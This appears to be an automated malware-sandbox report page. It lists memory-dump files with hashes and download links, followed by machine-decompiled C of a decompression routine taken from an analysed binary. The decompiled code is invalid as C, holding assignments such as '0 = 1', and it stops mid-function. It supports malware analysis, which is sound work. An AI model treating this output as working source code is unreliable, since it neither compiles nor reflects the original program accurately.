                                                                                                                          0x0040657a
                                                                                                                          0x0040657a
                                                                                                                          0x0040657d
                                                                                                                          0x0040657f
                                                                                                                          0x0040657f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067c1
                                                                                                                          0x004067c1
                                                                                                                          0x004067c1
                                                                                                                          0x004067c5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067cb
                                                                                                                          0x004067cb
                                                                                                                          0x004067ce
                                                                                                                          0x004067d1
                                                                                                                          0x004067d4
                                                                                                                          0x004067d6
                                                                                                                          0x004067d6
                                                                                                                          0x004067d6
                                                                                                                          0x004067d9
                                                                                                                          0x004067dc
                                                                                                                          0x004067df
                                                                                                                          0x004067e2
                                                                                                                          0x004067e5
                                                                                                                          0x004067e8
                                                                                                                          0x004067e9
                                                                                                                          0x004067eb
                                                                                                                          0x004067eb
                                                                                                                          0x004067eb
                                                                                                                          0x004067ee
                                                                                                                          0x004067f1
                                                                                                                          0x004067f4
                                                                                                                          0x004067f7
                                                                                                                          0x004067fa
                                                                                                                          0x004067fe
                                                                                                                          0x00406800
                                                                                                                          0x00406803
                                                                                                                          0x00000000
                                                                                                                          0x00406805
                                                                                                                          0x00406805
                                                                                                                          0x00406582
                                                                                                                          0x00406582
                                                                                                                          0x00000000
                                                                                                                          0x00406582
                                                                                                                          0x00406803
                                                                                                                          0x00406a38
                                                                                                                          0x00406a38
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406067
                                                                                                                          0x00406a6f
                                                                                                                          0x00406a6f
                                                                                                                          0x00000000
                                                                                                                          0x00406a6f
                                                                                                                          0x004068bc
                                                                                                                          0x0040693c
                                                                                                                          0x00406905

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                                                                                                          • Instruction ID: 2446724231f05ea51107c8768389afa7e2a62b3a86e3c0cdb9b17195a5c17046
                                                                                                                          • Opcode Fuzzy Hash: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                                                                                                          • Instruction Fuzzy Hash: E9A14F71E00228CFDB28CFA8C8547ADBBB1FB45305F21816AD956BB281D7785A96CF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040680A, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E0040680A() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
